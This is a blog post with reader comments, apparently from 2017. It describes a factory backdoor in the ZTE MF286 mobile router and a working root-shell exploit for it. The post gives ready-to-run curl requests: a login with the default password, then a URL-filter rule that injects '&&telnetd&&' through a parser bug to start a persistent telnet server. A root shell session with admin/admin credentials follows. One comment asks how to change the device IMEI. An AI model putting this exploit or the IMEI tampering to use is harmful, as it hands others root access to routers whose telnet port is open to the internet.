Sunday, March 26, 2017

Backdoor and root shell on ZTE MF286

ZTE MF286 has built-in factory backdoor allowing root shell access on embedded Linux running inside router. However since we don't know RSA-2048 private key used for encrypting device specific password we're not able to use this. Which doesn't mean we won't have other means to gain root shell.

Factory backdoor is triggered by opening specific URL. Password is device IMEI in hex but in encrypted form. This value is then decrypted using public key embedded in firmware. If result matches with device IMEI telnetd is started on port tcp/4719.

Here's syntax required to trigger factory backdoor, but it's useless without that encryption key.

 curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=CHANGE_MODE&change_mode=2&password=XXX"


We can still gain root shell on this device easily.

First we authenticate. Password is MIME encoded, here I use default password 1234.

curl "http://192.168.1.1/goform/goform_set_cmd_process" -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -H "Referer: http://192.168.1.1/index.html" --data "isTest=false&goformId=LOGIN&password=MTIzNA%3D%3D"

Next we add new URL filter rule that exploits bug in nvram parser to also start telnetd. 

curl "http://192.168.1.1/goform/goform_set_cmd_process" -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -H "Referer: http://192.168.1.1/index.html" --data "isTest=false&goformId=URL_FILTER_ADD&addURLFilter=http%3A%2F%2F_L33T_H4X0R_%2F%26%26telnetd%26%26"

One can now simply telnet to port 4719 on 192.168.1.1 and login as "admin" with password "admin".

(none) login: admin
Password: 

BusyBox v1.15.0 (2016-10-25 20:15:21 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

~ # uname -a
Linux (none) 2.6.31 #1 Tue Oct 25 20:15:00 CST 2016 mips GNU/Linux
~ # 

This is persistent and will start telnetd on after next reboot unless this special URL is removed via web interface first. CAUTION! Telnet server listens also on WAN side. Meaning after activating it ANYONE can login to your router over Internet. So only do this with mobile broadband DISCONNECTED.

at

10 comments:

  1. AnonymousWednesday, July 19, 2017

    "This is persistent and will start telnetd on after next reboot unless this special URL is removed via web interface first." Could you please be more specific about how I can remove the URL?

    ReplyDelete
  2. AnonymousWednesday, July 19, 2017

    Via Web Interface go to Advanced Settings/Firewall/URL Filtering ...

    ReplyDelete
  3. AnonymousFriday, September 01, 2017

    This doesn't work anymore. Authentication works but adding the rule does not.

    ReplyDelete
  4. AnonymousThursday, November 09, 2017

    Could you tell something more about "bug in nvram parser"? How and why it works?

    ReplyDelete
  5. AnonymousMonday, July 08, 2019

    Is it possible to disable the telnetd after activating it

    ReplyDelete
  6. AnonymousMonday, July 08, 2019

    The new url rule that exploits the bug doesn't work, is there anything i can do?

    ReplyDelete
  7. AnonymousTuesday, June 02, 2020

    HEllO Guys is there any way to unlock a ZTE router like the MF275R using the telnetd or shell Please I will appreciate any pointers

    ReplyDelete
  8. UnknownFriday, June 12, 2020

    Hello!
    Is it possible to update this router with newer software? It has TELE2_HR_MF286AV1.0.0B03 sw and cannot update anything newer.

    ReplyDelete
  9. AnonymousTuesday, April 20, 2021

    I have access to the serial port of the MF286, does anyone know how to modify the IMEI from the terminal? I have an invalid IMEI of 0000000000000 se.

    ReplyDelete

Got something to say?!

Subscribe to: Post Comments (Atom)